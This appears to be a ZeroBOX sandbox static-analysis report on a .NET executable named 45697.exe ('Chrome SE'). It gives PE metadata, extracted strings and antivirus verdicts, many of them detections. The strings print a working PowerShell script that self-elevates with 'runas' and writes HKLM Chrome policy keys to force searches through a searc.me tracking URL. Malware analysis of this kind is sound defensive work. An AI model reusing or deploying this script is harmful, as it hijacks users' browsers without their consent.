Static | ZeroBOX

PE Compile Time

2024-04-22 22:37:59

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00007f94 0x00008000 5.93442433852
.rsrc 0x0000a000 0x000203e8 0x00020400 5.90890286207
.reloc 0x0002c000 0x0000000c 0x00000200 0.0776331623432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00029d88 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00029d88 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00029d88 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00029d88 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00029d88 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00029d88 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x0002a1f0 0x0000005a LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0000a220 0x00000268 LANG_NEUTRAL SUBLANG_NEUTRAL MS Windows COFF Motorola 68000 object file
RT_MANIFEST 0x0002a250 0x00000193 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
**x2s
**xTs
$XK
$XK
$XK
Z+X([
Z+X([
# Get the ID and security principal of the current user account
$myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID)
# Get the security principal for the Administrator role
$adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator
# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
# We are running "as Administrator" - so change the title and background color to indicate this
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
$Host.UI.RawUI.BackgroundColor = "DarkBlue"
clear-host
# We are not running "as Administrator" - so relaunch as administrator
# Create a new process object that starts PowerShell
$newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";
# Specify the current script path and name as a parameter
$newProcess.Arguments = $myInvocation.MyCommand.Definition;
# Indicate that the process should be elevated
$newProcess.Verb = "runas";
# Start the new process
[System.Diagnostics.Process]::Start($newProcess);
# Exit from the current, unelevated, process
exit
# Run your code that needs to be elevated here
# Write-Host -NoNewLine "Press any key to continue..."
# $null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
$settings =
[PSCustomObject]@{ # Enable default search providers
Path = "SOFTWARE\Policies\Google\Chrome"
Value = 1
Name = "DefaultSearchProviderEnabled"
[PSCustomObject]@{ # Set search provider url
Path = "SOFTWARE\Policies\Google\Chrome"
Value = "https://searc.me/66e76889-cdf6-4795-a71c-23238a3b2b51?chname=45697&q={searchTerms}"
Name = "DefaultSearchProviderSearchURL"
} | group Path
foreach($setting in $settings){
$registry = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($setting.Name, $true)
if ($null -eq $registry) {
$registry = [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey($setting.Name, $true)
$setting.Group | %{
$registry.SetValue($_.name, $_.value)
$registry.Dispose()
v4.0.30319
#Strings
<Module>
45697.exe
Credential_Form
ModuleNameSpace
CREDUI_INFO
CREDUI_FLAGS
CredUI_ReturnCodes
User_Pwd
MainModuleRawUI
Input_Box
Choice_Box
ReadKey_Box
Keyboard_Form
Progress_Form
Progress_Data
Console_Info
FileType
STDHandle
MainModuleUI
MainModule
ConsoleColorProxy
MainAppInterface
MainApp
mscorlib
System
Object
ValueType
System.Management.Automation
System.Management.Automation.Host
PSHostRawUserInterface
System.Windows.Forms
PSHostUserInterface
PSHost
System.Text
StringBuilder
CredUIPromptForCredentials
PSCredentialTypes
PSCredentialUIOptions
PromptForPassword
cbSize
hwndParent
pszMessageText
pszCaptionText
hbmBanner
value__
INCORRECT_PASSWORD
DO_NOT_PERSIST
REQUEST_ADMINISTRATOR
EXCLUDE_CERTIFICATES
REQUIRE_CERTIFICATE
SHOW_SAVE_CHECK_BOX
ALWAYS_SHOW_UI
REQUIRE_SMARTCARD
PASSWORD_ONLY_OK
VALIDATE_USERNAME
COMPLETE_USERNAME
PERSIST
SERVER_CREDENTIAL
EXPECT_CONFIRMATION
GENERIC_CREDENTIALS
USERNAME_TARGET_CREDENTIALS
KEEP_USERNAME
NO_ERROR
ERROR_CANCELLED
ERROR_NO_SUCH_LOGON_SESSION
ERROR_NOT_FOUND
ERROR_INVALID_ACCOUNT_NAME
ERROR_INSUFFICIENT_BUFFER
ERROR_INVALID_PARAMETER
ERROR_INVALID_FLAGS
Password
Domain
ConsoleColor
GUIBackgroundColor
GUIForegroundColor
get_BackgroundColor
set_BackgroundColor
get_BufferSize
set_BufferSize
Coordinates
get_CursorPosition
set_CursorPosition
get_CursorSize
set_CursorSize
Invisible_Form
FlushInputBuffer
get_ForegroundColor
set_ForegroundColor
BufferCell
Rectangle
GetBufferContents
get_KeyAvailable
get_MaxPhysicalWindowSize
get_MaxWindowSize
KeyInfo
ReadKeyOptions
ReadKey
ScrollBufferContents
SetBufferContents
get_WindowPosition
set_WindowPosition
get_WindowSize
set_WindowSize
get_WindowTitle
set_WindowTitle
BackgroundColor
BufferSize
CursorPosition
CursorSize
ForegroundColor
KeyAvailable
MaxPhysicalWindowSize
MaxWindowSize
WindowPosition
WindowSize
WindowTitle
MB_GetString
DialogResult
System.Collections.ObjectModel
Collection`1
ChoiceDescription
ToUnicode
GetCharFromKeys
checkKeyDown
keyinfo
KeyEventArgs
Keyboard_Form_KeyDown
Keyboard_Form_KeyUp
ProgressBarColor
System.Timers
barNumber
barValue
inTick
System.Collections.Generic
List`1
progressDataList
System.Drawing
DrawingColor
InitializeComponent
ElapsedEventArgs
TimeTick
AddBar
GetCount
ProgressRecord
Update
lbActivity
lbStatus
ProgressBar
objProgressBar
lbRemainingTime
lbOperation
ActivityId
ParentActivityId
GetStdHandle
GetFileType
IsInputRedirected
IsOutputRedirected
IsErrorRedirected
FILE_TYPE_UNKNOWN
FILE_TYPE_DISK
FILE_TYPE_CHAR
FILE_TYPE_PIPE
FILE_TYPE_REMOTE
STD_INPUT_HANDLE
STD_OUTPUT_HANDLE
STD_ERROR_HANDLE
ErrorForegroundColor
ErrorBackgroundColor
WarningForegroundColor
WarningBackgroundColor
DebugForegroundColor
DebugBackgroundColor
VerboseForegroundColor
VerboseBackgroundColor
ProgressForegroundColor
ProgressBackgroundColor
Dictionary`2
PSObject
FieldDescription
Prompt
PromptForChoice
PSCredential
PromptForCredential
get_RawUI
ib_caption
ib_message
ReadLine
System.Security
SecureString
getPassword
ReadLineAsSecureString
WriteDebugLine
WriteErrorLine
WriteLine
WriteProgress
WriteVerboseLine
WriteWarningLine
parent
System.Globalization
CultureInfo
originalCultureInfo
originalUICultureInfo
get_PrivateData
_consoleColorProxy
get_CurrentCulture
get_CurrentUICulture
get_InstanceId
get_Name
get_UI
Version
get_Version
EnterNestedPrompt
ExitNestedPrompt
NotifyBeginApplication
NotifyEndApplication
SetShouldExit
PrivateData
CurrentCulture
CurrentUICulture
InstanceId
get_ErrorForegroundColor
set_ErrorForegroundColor
get_ErrorBackgroundColor
set_ErrorBackgroundColor
get_WarningForegroundColor
set_WarningForegroundColor
get_WarningBackgroundColor
set_WarningBackgroundColor
get_DebugForegroundColor
set_DebugForegroundColor
get_DebugBackgroundColor
set_DebugBackgroundColor
get_VerboseForegroundColor
set_VerboseForegroundColor
get_VerboseBackgroundColor
set_VerboseBackgroundColor
get_ProgressForegroundColor
set_ProgressForegroundColor
get_ProgressBackgroundColor
set_ProgressBackgroundColor
get_ShouldExit
set_ShouldExit
get_ExitCode
set_ExitCode
ShouldExit
ExitCode
shouldExit
exitCode
UnhandledExceptionEventArgs
CurrentDomain_UnhandledException
credinfo
targetName
reserved1
iError
userName
maxUserName
password
maxPassword
pfSave
System.Runtime.InteropServices
MarshalAsAttribute
UnmanagedType
caption
message
target
credTypes
options
rectangle
source
destination
origin
contents
strTitle
strPrompt
strVal
blSecure
arrChoice
intDefault
wVirtKey
wScanCode
lpKeyState
pwszBuff
OutAttribute
cchBuff
wFlags
blShift
blAltGr
blIncludeKeyDown
sender
position
BarColor
objRecord
stdHandle
descriptions
choices
defaultChoice
allowedCredentialTypes
foregroundColor
backgroundColor
sourceId
record
System.Reflection
AssemblyTitleAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
AssemblyVersionAttribute
AssemblyFileVersionAttribute
AssemblyDescriptionAttribute
AssemblyCompanyAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DllImportAttribute
credui
String
IsNullOrEmpty
Marshal
SizeOf
IntPtr
ToString
StructLayoutAttribute
LayoutKind
FlagsAttribute
set_Opacity
set_ShowInTaskbar
Control
set_Visible
get_Bottom
get_Top
get_Right
get_Left
Address
BufferCellType
set_Height
set_Width
AppDomain
get_CurrentDomain
get_FriendlyName
user32.dll
ContainerControl
set_AutoScaleDimensions
AutoScaleMode
set_AutoScaleMode
TextBox
Button
set_Text
set_Location
Screen
FromControl
get_Bounds
get_Width
set_MaximumSize
set_AutoSize
ControlCollection
get_Controls
set_UseSystemPasswordChar
SetBounds
PtrToStringUni
set_DialogResult
set_ClientSize
AddRange
FormBorderStyle
set_FormBorderStyle
FormStartPosition
set_StartPosition
Assembly
GetExecutingAssembly
get_Location
ExtractAssociatedIcon
set_Icon
set_MinimizeBox
set_MaximizeBox
IButtonControl
set_AcceptButton
set_CancelButton
ShowDialog
get_Text
get_Count
RadioButton
ToolTip
IEnumerator`1
GetEnumerator
get_Current
get_Label
set_Checked
get_Height
get_HelpMessage
SetToolTip
System.Collections
IEnumerator
MoveNext
IDisposable
Dispose
set_ShowAlways
get_Checked
KeyEventHandler
add_KeyDown
add_KeyUp
get_KeyValue
set_VirtualKeyCode
get_KeyCode
get_Shift
get_Alt
get_Control
get_Chars
set_Character
set_KeyDown
ControlKeyStates
set_ControlKeyState
get_ControlKeyState
get_Modifiers
get_Black
get_Blue
get_Cyan
ColorTranslator
FromHtml
get_Magenta
get_Red
get_White
get_Yellow
SuspendLayout
ScrollableControl
set_AutoScroll
set_BackColor
set_ControlBox
ResumeLayout
ElapsedEventHandler
add_Elapsed
set_Interval
set_AutoReset
get_Item
set_Value
Refresh
set_Left
set_Top
get_Font
FontStyle
set_Font
ProgressBarStyle
set_Style
set_ForeColor
set_Size
get_ActivityId
ProgressRecordType
get_RecordType
Remove
System.ComponentModel
Component
RemoveAt
get_ParentActivityId
Insert
get_Activity
get_StatusDescription
get_PercentComplete
get_SecondsRemaining
TimeSpan
get_TotalHours
get_Minutes
get_Seconds
Format
Concat
get_CurrentOperation
Application
DoEvents
Kernel32.dll
MessageBox
get_ParameterAssemblyFullName
RuntimeTypeHandle
GetTypeFromHandle
GetType
get_IsArray
GetElementType
MakeGenericType
EmptyTypes
ConstructorInfo
BindingFlags
Binder
ParameterModifier
GetConstructor
Invoke
Convert
ChangeType
InvokeMember
op_Inequality
op_Equality
get_DefaultValue
Exception
ToCharArray
AppendChar
Console
ConsoleKeyInfo
ConsoleKey
get_Key
get_Length
get_KeyChar
System.Threading
Thread
get_CurrentThread
NewGuid
AsPSObject
ArgumentNullException
STAThreadAttribute
<>c__DisplayClass6
ManualResetEvent
DataAddedEventArgs
<Main>b__0
<Main>b__1
IAsyncResult
<Main>b__2
PSDataCollection`1
ErrorRecord
get_Index
get_Exception
get_Message
get_IsCompleted
EventWaitHandle
EnableVisualStyles
UnhandledExceptionEventHandler
add_UnhandledException
System.Management.Automation.Runspaces
RunspaceFactory
Runspace
CreateRunspace
ApartmentState
set_ApartmentState
PowerShell
Create
set_Runspace
PSDataStreams
get_Streams
get_Error
EventHandler`1
add_DataAdded
Complete
Compare
StringComparison
StartsWith
StringSplitOptions
MessageBoxButtons
MessageBoxIcon
System.Diagnostics
Debugger
Launch
System.IO
Stream
GetManifestResourceStream
Encoding
get_UTF8
StreamReader
TextReader
ReadToEnd
WriteAllText
AddScript
System.Text.RegularExpressions
get_Success
GroupCollection
get_Groups
Double
TryParse
AddParameter
Capture
get_Value
ToUpper
Boolean
AddArgument
AddCommand
AsyncCallback
PSInvocationSettings
BeginInvoke
WaitHandle
WaitOne
PSInvocationStateInfo
get_InvocationStateInfo
PSInvocationState
get_State
get_Reason
CompilerGeneratedAttribute
45697.ps1
Chrome SE
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
x#IDATx
]"ha':
Ld@OK"
T0z{2/z
ZGJJ7!Z
.$Pt"g
<bEbT-
GBoZ2H
d U]!
$.$Jr@
GuWcVl.
X(E%!a
sd,K=r
.o|+~bp
hXHC8t
K]~VH@w
rk`/{)
D"3{kf
BvC{g6
=y~?~{F
GkLLDp
lB<@'R
r2/"1Jr
t-2Nxkr
xnqw`L
y5<8y?6
`[L{[r
B3*&r=
O<'qTal
r`y@P(W
7n:x3\
TwcOuw
TwaOuW
~sjbj(
'?:515
Yd{\F7
qO$xy
zgm~K&
{:oOd~
z=[fotr
=}`Mvy~
7<X90Q
%)e$}A
")f&yC
$\"eB
$,m;J
2+^!|7v,
*`"v>
0vXe#"
-(Xg3n(
+^"]7u,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Secure input:
Input:
Cancel
Press a key
#000080
#808080
#008000
#008080
#800080
#800000
#808000
#C0C0C0
#00FF00
Remaining time:
{0:00}:{1:00}:{2:00}
System.Collections.Generic.List
{0}[{1}]:
ToArray
(Type !? for help.)
Wrong format, please repeat input:
PSRunspace-Host
-extract
If you specify the -extract option you need to add a file for extraction in this way
-extract:"<filename>"
-debug
45697.ps1
^-([^: ]+)[ :]?([^:]*)$
$FALSE
Out-String
Stream
Click OK to exit...
Unhandled exception in
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
InternalName
45697.exe
LegalCopyright
OriginalFilename
45697.exe
ProductName
Chrome SE
ProductVersion
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Artemis
ALYac Gen:Variant.Lazy.418759
Cylance Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Gen:Variant.Lazy.418759
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Lazy.418759
Tencent Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Gen:Variant.Lazy.418759
TrendMicro Clean
Trapmine malicious.high.ml.score
FireEye Gen:Variant.Lazy.418759
Emsisoft Gen:Variant.Lazy.418759 (B)
SentinelOne Static AI - Suspicious PE
GData Gen:Variant.Lazy.418759
Jiangmin Clean
Webroot Clean
Varist W32/Ursu.CY.gen!Eldorado
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Lazy.D663C7
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Znyonm
Google Detected
AhnLab-V3 Trojan/Win.Kryptik.C5158283
Acronis Clean
McAfee Artemis!91BC63BBAEB5
MAX malware (ai score=86)
VBA32 Clean
Malwarebytes Malware.AI.3944776291
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
Ikarus HackTool.Win32.Malagent
MaxSecure Trojan.Malware.300983.susgen
Fortinet Clean
BitDefenderTheta Gen:NN.ZemsilF.36804.km0@amYX6Zl
AVG Clean
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.